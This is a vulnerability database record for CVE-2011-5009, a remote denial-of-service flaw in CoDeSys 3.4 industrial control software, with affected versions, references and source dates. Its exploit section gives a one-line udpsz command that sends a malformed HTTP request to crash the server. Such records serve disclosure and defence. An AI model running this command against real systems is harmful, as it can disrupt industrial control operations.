ID
VAR-E-201111-0008
CVE
| cve_id: | CVE-2011-5009 | Trust: 1.9 |
| cve_id: | CVE-2011-5007 | Trust: 0.3 |
| cve_id: | CVE-2011-5008 | Trust: 0.3 |
EDB ID
36378
TITLE
CoDeSys 3.4 - Null Pointer Invalid HTTP Request Parsing Remote Denial of Service - Multiple dos Exploit
Trust: 0.6
DESCRIPTION
CoDeSys 3.4 - Null Pointer Invalid HTTP Request Parsing Remote Denial of Service. CVE-2011-5009CVE-77389 . dos exploit for Multiple platform
Trust: 0.6
AFFECTED PRODUCTS
| vendor: | codesys | model: | - | scope: | eq | version: | 3.4 | Trust: 1.0 |
| vendor: | 3s smart | model: | codesys sp4 patch | scope: | eq | version: | 3.42 | Trust: 0.6 |
| vendor: | 3s smart | model: | codesys | scope: | eq | version: | 3.4 | Trust: 0.6 |
| vendor: | 3s smart | model: | codesys | scope: | eq | version: | 2.3 | Trust: 0.6 |
| vendor: | 3s smart | model: | codesys | scope: | ne | version: | 3.5 | Trust: 0.6 |
| vendor: | 3s smart | model: | codesys | scope: | ne | version: | 2.3.9.32 | Trust: 0.6 |
EXPLOIT
source: https://www.securityfocus.com/bid/50854/info
CoDeSys is prone to multiple denial-of-service vulnerabilities.
An attacker can exploit these issues to crash the application and deny service to legitimate users.
udpsz -T -c "BLAH / HTTP/1.0\r\n\r\n" SERVER 8080 -1
Trust: 1.0
EXPLOIT LANGUAGE
txt
Trust: 0.6
PRICE
free
Trust: 0.6
TYPE
Null Pointer Invalid HTTP Request Parsing Remote Denial of Service
Trust: 1.0
CREDITS
Luigi Auriemma
Trust: 0.6
EXTERNAL IDS
| db: | NVD | id: | CVE-2011-5009 | Trust: 1.9 |
| db: | BID | id: | 50854 | Trust: 1.9 |
| db: | EXPLOIT-DB | id: | 36378 | Trust: 1.6 |
| db: | ICS CERT | id: | ICSA-12-006-01 | Trust: 0.6 |
| db: | EDBNET | id: | 57722 | Trust: 0.6 |
| db: | NVD | id: | CVE-2011-5007 | Trust: 0.3 |
| db: | NVD | id: | CVE-2011-5008 | Trust: 0.3 |
| db: | BID | id: | 50849 | Trust: 0.3 |
REFERENCES
| url: | https://nvd.nist.gov/vuln/detail/cve-2011-5009 | Trust: 1.6 |
| url: | https://www.securityfocus.com/bid/50854/info | Trust: 1.0 |
| url: | http://www.3s-software.com/index.shtml?en_codesysv3_en | Trust: 0.6 |
| url: | http://aluigi.altervista.org/adv/codesys_1-adv.txt | Trust: 0.6 |
| url: | http://www.us-cert.gov/control_systems/pdf/icsa-12-006-01.pdf | Trust: 0.6 |
| url: | https://www.exploit-db.com/exploits/36378/ | Trust: 0.6 |
SOURCES
| db: | BID | id: | 50854 |
| db: | BID | id: | 50849 |
| db: | EXPLOIT-DB | id: | 36378 |
| db: | EDBNET | id: | 57722 |
LAST UPDATE DATE
2022-07-27T09:12:24.915000+00:00
SOURCES UPDATE DATE
| db: | BID | id: | 50854 | date: | 2012-01-10T20:00:00 |
| db: | BID | id: | 50849 | date: | 2012-11-15T23:10:00 |
SOURCES RELEASE DATE
| db: | BID | id: | 50854 | date: | 2011-11-30T00:00:00 |
| db: | BID | id: | 50849 | date: | 2011-11-29T00:00:00 |
| db: | EXPLOIT-DB | id: | 36378 | date: | 2011-11-30T00:00:00 |
| db: | EDBNET | id: | 57722 | date: | 2011-11-30T00:00:00 |